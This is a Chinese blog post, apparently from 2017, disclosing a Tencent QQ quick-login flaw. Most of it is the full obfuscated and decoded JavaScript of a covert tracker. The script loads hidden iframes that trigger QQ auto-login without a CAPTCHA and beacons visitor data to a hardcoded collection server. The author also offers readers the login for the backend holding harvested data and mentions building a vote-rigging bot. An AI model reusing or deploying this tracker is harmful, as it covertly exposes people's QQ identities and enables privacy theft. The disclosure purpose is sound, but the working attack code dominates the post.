
【首发】上亿用户QQ号码泄露,腾讯WEB产品漏洞

2017年02月16日 ⁄ 综合

这次的漏洞主要由腾讯的快速登录(ptlogin2)控制不严导致:只要用户访问的网站(包括被植入了这段脚本的任何第三方站点)执行了下面的代码,用户的 QQ 号就有可能在毫无感知的情况下泄露。


隐藏 iframe 中加载的快速登录地址是:http://ui.ptlogin2.qq.com/cgi-bin/login?hide_title_bar=1&low_login=0&qlogin_auto_login=1&no_verifyimg=1&link_target=blank&appid=20715148&style=12&target=self&s_url=http%3A//qzs.qq.com/qzone/v5/loginsucc.html?para=izone&pt_qr_app=%CA%D6%BB%FAQQ%BF%D5%BC%E4&pt_qr_link=http%3A//z.qzone.com/download.html&self_regurl=http%3A//qzs.qq.com/qzone/v6/reg/index.html&pt_qr_help_link=http%3A//z.qzone.com/download.html& (脚本会在末尾再拼上 6 位随机数)。从参数名看,hide_title_bar=1、qlogin_auto_login=1、no_verifyimg=1 三个参数使登录在无界面、无验证码的情况下自动完成。

1.抓取qq数据代码


  // NOTE(review): this is the obfuscated tracking script exactly as captured;
  // it is reproduced for analysis, not for reuse. Every string the script
  // needs is hex-escaped into this 25-element table (a hand-decoded rendering
  // follows further down the page). __[0] decodes to "2769197433", __[1] to
  // "4", __[2] is the plain-text collection server http://116.251.208.134:8080;
  // the remaining entries are DOM property names ("floor", "random", "src",
  // "referrer", "write", "getElementById", "innerHTML"), URL fragments for the
  // two beacons (/p.php?qq=, &u=, &ref=, /p2.php?&u=, &date=) and the HTML
  // for the hidden div, the meishi.qq.com iframe, the ui.ptlogin2.qq.com
  // quick-login iframe and the user.qzone.qq.com img.
  1. __ = ["\x32\x37\x36\x39\x31\x39\x37\x34\x33\x33", "\x34", "http://116.251.208.134:8080", "", "\x66\x6c\x6f\x6f\x72", "\x72\x61\x6e\x64\x6f\x6d", "\x73\x72\x63", "\x2f\x70\x2e\x70\x68\x70\x3f\x71\x71\x3d", "\x26\x75\x3d", "\x26\x72\x65\x66\x3d", "\x72\x65\x66\x65\x72\x72\x65\x72", "\x26", "\x77\x72\x69\x74\x65", "\x3c\x64\x69\x76 \x73\x74\x79\x6c\x65\x3d\"\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65\x3b\" \x69\x64\x3d\"\x71\x71\x65\x65\x5f\x70\x70\x63\x6e\x7a\x7a\"\x3e\x3c\x2f\x64\x69\x76\x3e", "\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64", "\x71\x71\x65\x65\x5f\x70\x70\x63\x6e\x7a\x7a", "\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\x2f\x2f\x6d\x65\x69\x73\x68\x69\x2e\x71\x71\x2e\x63\x6f\x6d\x2f\x70\x72\x6f\x66\x69\x6c\x65\x73\x2f", "\x3f", "\" \x77\x69\x64\x74\x68\x3d\"\x30\" \x68\x65\x69\x67\x68\x74\x3d\"\x30\" \x73\x63\x72\x6f\x6c\x6c\x69\x6e\x67\x3d\"\x6e\x6f\"\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e", "\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c", "\x3c\x69\x66\x72\x61\x6d\x65 
\x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\x2f\x2f\x75\x69\x2e\x70\x74\x6c\x6f\x67\x69\x6e\x32\x2e\x71\x71\x2e\x63\x6f\x6d\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x6c\x6f\x67\x69\x6e\x3f\x68\x69\x64\x65\x5f\x74\x69\x74\x6c\x65\x5f\x62\x61\x72\x3d\x31\x26\x6c\x6f\x77\x5f\x6c\x6f\x67\x69\x6e\x3d\x30\x26\x71\x6c\x6f\x67\x69\x6e\x5f\x61\x75\x74\x6f\x5f\x6c\x6f\x67\x69\x6e\x3d\x31\x26\x6e\x6f\x5f\x76\x65\x72\x69\x66\x79\x69\x6d\x67\x3d\x31\x26\x6c\x69\x6e\x6b\x5f\x74\x61\x72\x67\x65\x74\x3d\x62\x6c\x61\x6e\x6b\x26\x61\x70\x70\x69\x64\x3d\x32\x30\x37\x31\x35\x31\x34\x38\x26\x73\x74\x79\x6c\x65\x3d\x31\x32\x26\x74\x61\x72\x67\x65\x74\x3d\x73\x65\x6c\x66\x26\x73\x5f\x75\x72\x6c\x3d\x68\x74\x74\x70\x25\x33\x41\x2f\x2f\x71\x7a\x73\x2e\x71\x71\x2e\x63\x6f\x6d\x2f\x71\x7a\x6f\x6e\x65\x2f\x76\x35\x2f\x6c\x6f\x67\x69\x6e\x73\x75\x63\x63\x2e\x68\x74\x6d\x6c\x3f\x70\x61\x72\x61\x3d\x69\x7a\x6f\x6e\x65\x26\x70\x74\x5f\x71\x72\x5f\x61\x70\x70\x3d\x25\x43\x41\x25\x44\x36\x25\x42\x42\x25\x46\x41\x51\x51\x25\x42\x46\x25\x44\x35\x25\x42\x43\x25\x45\x34\x26\x70\x74\x5f\x71\x72\x5f\x6c\x69\x6e\x6b\x3d\x68\x74\x74\x70\x25\x33\x41\x2f\x2f\x7a\x2e\x71\x7a\x6f\x6e\x65\x2e\x63\x6f\x6d\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x2e\x68\x74\x6d\x6c\x26\x73\x65\x6c\x66\x5f\x72\x65\x67\x75\x72\x6c\x3d\x68\x74\x74\x70\x25\x33\x41\x2f\x2f\x71\x7a\x73\x2e\x71\x71\x2e\x63\x6f\x6d\x2f\x71\x7a\x6f\x6e\x65\x2f\x76\x36\x2f\x72\x65\x67\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x26\x70\x74\x5f\x71\x72\x5f\x68\x65\x6c\x70\x5f\x6c\x69\x6e\x6b\x3d\x68\x74\x74\x70\x25\x33\x41\x2f\x2f\x7a\x2e\x71\x7a\x6f\x6e\x65\x2e\x63\x6f\x6d\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x2e\x68\x74\x6d\x6c\x26", "\" \x77\x69\x64\x74\x68\x3d\"\x30\" \x68\x65\x69\x67\x68\x74\x3d\"\x30\" \x73\x63\x72\x6f\x6c\x6c\x69\x6e\x67\x3d\"\x6e\x6f\"\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e\x3c\x69\x6d\x67 \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\x2f\x2f\x75\x73\x65\x72\x2e\x71\x7a\x6f\x6e\x65\x2e\x71\x71\x2e\x63\x6f\x6d\x2f", 
"\x2f\x6d\x61\x69\x6e\x23\x21\x61\x70\x70\x3d\x33\x31\x31\x26\x75\x72\x6c\x3d\x68\x74\x74\x70\x25\x33\x41\x25\x32\x46\x25\x32\x46\x63\x6e\x63\x2e\x71\x7a\x73\x2e\x71\x71\x2e\x63\x6f\x6d\x25\x32\x46\x71\x7a\x6f\x6e\x65\x25\x32\x46\x61\x70\x70\x25\x32\x46\x6d\x6f\x6f\x64\x5f\x76\x36\x25\x32\x46\x68\x74\x6d\x6c\x25\x32\x46\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x25\x33\x46\x6d\x6f\x6f\x64\x25\x32\x33\x75\x69\x6e\x25\x33\x44\x32\x30\x37\x31\x35\x31\x34\x38\x25\x32\x36\x70\x66\x69\x64\x25\x33\x44\x32\x25\x32\x36\x71\x7a\x5f\x76\x65\x72\x25\x33\x44\x36\x25\x32\x36\x61\x70\x70\x63\x61\x6e\x76\x61\x73\x25\x33\x44\x30\x25\x32\x36\x71\x7a\x5f\x73\x74\x79\x6c\x65\x25\x33\x44\x76\x36\x25\x32\x46\x38\x38\x25\x32\x36\x70\x61\x72\x61\x6d\x73\x25\x33\x44\x25\x32\x36\x65\x6e\x74\x65\x72\x74\x69\x6d\x65\x25\x33\x44\x31\x33\x38\x31\x35\x35\x33\x30\x34\x33\x38\x39\x30\x25\x32\x36\x63\x61\x6e\x76\x61\x73\x74\x79\x70\x65\x25\x33\x44\" \x73\x74\x79\x6c\x65\x3d\"\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65\x3b\"\x3e", "\x2f\x70\x32\x2e\x70\x68\x70\x3f\x26\x75\x3d", "\x26\x64\x61\x74\x65\x3d"];
  // --- constants pulled from the obfuscated string table ---------------------
  // __[0] decodes to "2769197433": sent as `qq=` in the first beacon and used
  // as the path segment of the meishi.qq.com/profiles/ and user.qzone.qq.com/
  // URLs built below. __[1] decodes to "4" and is sent as `u=` in both
  // beacons. __[2] is the collection server http://116.251.208.134:8080.
  2. var lE1 = __[0];
  3. var TDY2 = __[1];
  4. var aiOZRpLIr3 = __[2];
  // Returns a 6-character string of random decimal digits: starts from __[3]
  // ("") and appends Math.floor(Math.random() * 10) six times (the hex-escaped
  // names are "Math", "floor", "random"). Appended to every URL below,
  // presumably as a cache-buster so each request reaches the server.
  5. function nummax() {
  6.     var eccQCETuM4 = __[3];
  7.     for (var WBLc5 = 0; WBLc5 < 6; WBLc5++) {
  8.         eccQCETuM4 += window["\x4d\x61\x74\x68"][__[4]](window["\x4d\x61\x74\x68"][__[5]]() * 10);
  9.     };
  10.     return eccQCETuM4;
  11. };
  // Single Image object reused for both beacons: assigning .src (__[6]) fires
  // a GET to the collection server with no visible element.
  12. var jjkdSPqa6 = new Image();
  // Beacon 1. Builds
  //   <server>/p.php?qq=<__[0]>&u=<__[1]>&ref=<escape(document.referrer)>&<random>
  // i.e. it reports the referrer of the page hosting this script to the
  // collection server (the hex names decode to "escape", "document"; __[10]
  // is "referrer").
  13. function p_sitefun() {
  14.     jjkdSPqa6[__[6]] = aiOZRpLIr3 + __[7] + lE1 + __[8] + TDY2 + __[9] + window["\x65\x73\x63\x61\x70\x65"](window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"][__[10]]) + __[11] + nummax();
  15. };
  // document.write() (__[12]) of the hidden container
  //   <div style="display:none;" id="qqee_ppcnzz"></div>
  // into which the iframes and img below are injected, then look it up by id.
  16. window["document"][__[12]](__[13]);
  17. var GGHfiolV7 = window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"][__[14]](__[15]);
  // XU8 receives the iframe markup built by tab(); j9 is assigned but never
  // read anywhere in this listing; teBc10 accumulates the delays scheduled in
  // the loop below.
  18. var XU8;
  19. var j9 = 3;
  20. var teBc10 = 0;
  // First beacon fires 3.5 s after the script runs.
  21. setTimeout(p_sitefun, 3500);
  // Appends (innerHTML +=, __[19]) a 0x0, non-scrolling iframe pointing at
  //   http://meishi.qq.com/profiles/<__[0]>?<random>
  // to the hidden div; every call adds one more frame.
  22. function tab() {
  23.     XU8 = __[16] + lE1 + __[17] + nummax() + __[18];
  24.     GGHfiolV7[__[19]] += XU8;
  25. };
  // Replaces the hidden div's content with two elements:
  //   1. a 0x0 iframe loading the Tencent quick-login endpoint
  //      http://ui.ptlogin2.qq.com/cgi-bin/login?hide_title_bar=1&low_login=0
  //        &qlogin_auto_login=1&no_verifyimg=1&...&<random>
  //      - the same URL quoted in the article body. Judging by the parameter
  //      names, the login is meant to complete with no title bar, no CAPTCHA
  //      and no user action; the article identifies this step as the cause
  //      of the leak.
  //   2. a display:none <img> whose src is
  //      http://user.qzone.qq.com/<__[0]>/main#!app=311&url=...
  // NOTE(review): the page does not spell out how the victim's QQ number
  // reaches the operator. The sequence (silent login, then loads of the
  // 2769197433 profile pages) suggests the visit itself is what gets
  // recorded on that account's side - confirm with a traffic capture
  // before relying on this reading.
  26. function tab1() {
  27.     GGHfiolV7[__[19]] = __[20] + nummax() + __[21] + lE1 + __[22];
  28. };
  // Schedule: tab() at 0 ms and 3000 ms (two meishi frames), then tab1() at
  // 4500 ms, which replaces them with the login frame and the Qzone img.
  29. for (var RO11 = 0; RO11 < 2; RO11++) {
  30.     teBc10 = RO11 * 3000;
  31.     setTimeout(tab, teBc10);
  32.     if (RO11 == 1) {
  33.         teBc10 += 1500;
  34.         setTimeout(tab1, teBc10);
  35.     }
  36. };
  // Beacon 2. Increments a call counter and requests
  //   <server>/p2.php?&u=<__[1]>&date=<counter>&<random>
  // (__[23] is "/p2.php?&u=", __[24] is "&date=").
  37. var ONrCvWhbZ12 = 0;
  38. function userstop() {
  39.     ONrCvWhbZ12 += 1;
  40.     jjkdSPqa6[__[6]] = aiOZRpLIr3 + __[23] + TDY2 + __[24] + ONrCvWhbZ12 + __[11] + nummax();
  41. };
  // Fire userstop() once a minute for ten minutes (60 s .. 600 s): a
  // heartbeat / dwell-time report to the collection server.
  42. var PEiTi13 = 0;
  43. for (var aFjMXogw14 = 1; aFjMXogw14 < 11; aFjMXogw14++) {
  44.     PEiTi13 = aFjMXogw14 * 60000;
  45.     setTimeout(userstop, PEiTi13);
  46. }

解密转码显示


  // Hand-decoded string table from the obfuscated listing above. NOTE: this
  // rendering is not runnable JavaScript - the 25 array elements are shown
  // joined into one comma-separated string (and split across a blank line);
  // in the live script they are separate entries indexed __[0]..__[24].
  // Elements, in order: "2769197433", "4", the collection server
  // http://116.251.208.134:8080, "", "floor", "random", "src", "/p.php?qq=",
  // "&u=", "&ref=", "referrer", "&", "write", the hidden div, "getElementById",
  // "qqee_ppcnzz", the meishi.qq.com iframe prefix, "?", the iframe suffix,
  // "innerHTML", the ui.ptlogin2.qq.com quick-login iframe prefix, the suffix
  // that also opens the user.qzone.qq.com img, the img suffix, "/p2.php?&u=",
  // "&date=".
  1. __ = '2769197433,4,http://116.251.208.134:8080,,floor,random,src,/p.php?qq=,&u=,&ref=,referrer,&,write,<div style="display:none;" id="qqee_ppcnzz">

,getElementById,qqee_ppcnzz,<iframe src="http://meishi.qq.com/profiles/,?," width="0" height="0" scrolling="no"></iframe>,innerHTML,<iframe src="http://ui.ptlogin2.qq.com/cgi-bin/login?hide_title_bar=1&low_login=0&qlogin_auto_login=1&no_verifyimg=1&link_target=blank&appid=20715148&style=12&target=self&s_url=http%3A//qzs.qq.com/qzone/v5/loginsucc.html?para=izone&pt_qr_app=%CA%D6%BB%FAQQ%BF%D5%BC%E4&pt_qr_link=http%3A//z.qzone.com/download.html&self_regurl=http%3A//qzs.qq.com/qzone/v6/reg/index.html&pt_qr_help_link=http%3A//z.qzone.com/download.html&," width="0" height="0" scrolling="no"></iframe><img src="http://user.qzone.qq.com/,/main#!app=311&url=http%3A%2F%2Fcnc.qzs.qq.com%2Fqzone%2Fapp%2Fmood_v6%2Fhtml%2Findex.html%3Fmood%23uin%3D20715148%26pfid%3D2%26qz_ver%3D6%26appcanvas%3D0%26qz_style%3Dv6%2F88%26params%3D%26entertime%3D1381553043890%26canvastype%3D" style="display:none;">,/p2.php?&u=,&date=';

  // Decoded rendering of the script body. Bracket accesses such as
  // window[Math][floor] or jjkdSPqa6[src] stand for the original
  // window["Math"]["floor"] / jjkdSPqa6["src"] with the hex escapes removed;
  // this listing is for reading, not for execution.
  // lE1 = "2769197433" (profile/uin path segment and `qq=` value),
  // TDY2 = "4" (`u=` value), aiOZRpLIr3 = the collection server.
  • var lE1 = __[0];
  • var TDY2 = __[1];
  • var aiOZRpLIr3 = __[2];
  • // random number: a 6-character string of random decimal digits,
  • // appended to every URL below (presumably as a cache-buster)
  • function nummax() {
  •     var eccQCETuM4 = __[3];
  •     for (var WBLc5 = 0; WBLc5 < 6; WBLc5++) {
  •         eccQCETuM4 += window[Math][floor](window["Math"][random]() * 10);
  •     };
  •     return eccQCETuM4;
  • };
  • var jjkdSPqa6 = new Image();// create an Image object; setting .src fires a GET (beacon)
  • // Beacon 1: report the hosting page's referrer to the collection server as
  • //   <server>/p.php?qq=2769197433&u=4&ref=<escape(document.referrer)>&<random>
  • function p_sitefun() {
  •     jjkdSPqa6[src] = aiOZRpLIr3 + "/p.php?qq=" + lE1 + "&u=" + TDY2 + "&ref=" + window[escape](window["document"][referrer]) + "&" + nummax();
  • };
  • // document.write the hidden <div style="display:none;" id="qqee_ppcnzz">
  • // container, then grab it by id
  • window["document"][write](__[13]);
  • var GGHfiolV7 = window["document"][getElementById]("qqee_ppcnzz");
  • var XU8;
  • var j9 = 3; // never read in this listing
  • var teBc10 = 0;
  • setTimeout(p_sitefun, 3500); // first beacon after 3.5 s
  • // timed send: append a 0x0 iframe for http://meishi.qq.com/profiles/2769197433?<random>
  • function tab() {
  •     XU8 = __[16] + lE1 + "?" + nummax() + __[18];
  •     GGHfiolV7[innerHTML] += XU8; // output the meishi frame (called twice)
  • };
  • // timed send: replace the div content with the 0x0 quick-login iframe
  • // (ui.ptlogin2.qq.com ... qlogin_auto_login=1&no_verifyimg=1 ... &<random>)
  • // followed by a display:none img for http://user.qzone.qq.com/2769197433/main#!...
  • // NOTE(review): the article does not state how the victim's QQ number
  // reaches the operator; the silent login followed by loads of the
  • // 2769197433 profile pages suggests the visit itself is what gets recorded
  • // on that account's side - confirm with a capture.
  • function tab1() {
  •     GGHfiolV7[innerHTML] = __[20] + nummax() + __[21] + lE1 + __[22];// output the login frame and the Qzone img
  • };
  • // schedule: tab() at 0 ms and 3000 ms, tab1() at 4500 ms
  • for (var RO11 = 0; RO11 < 2; RO11++) {
  •     teBc10 = RO11 * 3000;
  •     setTimeout(tab, teBc10);
  •     if (RO11 == 1) {
  •         teBc10 += 1500;
  •         setTimeout(tab1, teBc10);// called once
  •     }
  • };
  • // timed send: beacon 2, <server>/p2.php?&u=4&date=<call count>&<random>
  • var ONrCvWhbZ12 = 0;
  • function userstop() {
  •     ONrCvWhbZ12 += 1;
  •     jjkdSPqa6[src] = aiOZRpLIr3 + "/p2.php?&u=" + TDY2 + "&date=" + ONrCvWhbZ12 + "&" + nummax();
  • };
  • var PEiTi13 = 0;
  • for (var aFjMXogw14 = 1; aFjMXogw14 < 11; aFjMXogw14++) {
  •     PEiTi13 = aFjMXogw14 * 60000;
  •     setTimeout(userstop, PEiTi13);// send data to the server 10 times on a timer (once a minute), confirming the IP address and app ID
  • }
    2.后台抓取数据管理(后台截图略)

    3.代码分析

    已经在乌云写过一次,不想再写了,看我上面写的注释就好了。

    4.漏洞成因是腾讯的快速登录控制不严导致:从代码看,登录地址带有 hide_title_bar=1、qlogin_auto_login=1、no_verifyimg=1 三个参数,并且被放在 0×0 的隐藏 iframe 里加载,用户既看不到界面,也没有任何确认步骤。

    5.结果说明一切,这是后台登录截图,想测试的可以给我发站内短消息,我可以把地址、账号和密码给你。

    写着累,已经提交到乌云了。

    ----------------------------------------------------------------------华丽的分割线--------------------------------------------------------------------------------------

    本来这文章是不想在这博客发表的,只是乌云审核实在太严了。漏洞还要原创,你要明白,我们属于互联网的建设者而不是破坏者,不会每天去研究别人网站,收集漏洞。这次也是一个客户买了这个漏洞功能问我。我发觉这漏洞泄露了用户隐私,提交到乌云是想让厂商修复。

    去年大洋网有一个民间投票选最高人气主持的程序,由于投票存在 BUG,只限制 IP 与 COOKIES,我写了个清理 COOKIES 并每 5 分钟自动换 IP 的自动刷票程序,也提交到了乌云上,同样没有审核通过。我认为漏洞发掘者只要提供漏洞结果并拿出证据,这就是一个漏洞,而不必写得像长篇论文一样,不一定非要提供漏洞原理、细致说明,并写出自己的工具去证明这个漏洞存在。修复方案没写详细也不给审核,这完全是胡扯:我发现了漏洞,还一定要帮你补好,修复方案不完整也不给审核。最扯淡的还是那个必须原创发现的要求:这次这个漏洞是黑客卖给商家、商家使用时被我发现的,我给你拿出全部代码,并给你解密、加上注释,还不算原创。

    乌云真的是一片乌云,看不清内情,你是审核的人不是专业的,还是想做安全行业老大控制全互联网各种漏洞,囤积黑客团队资源?
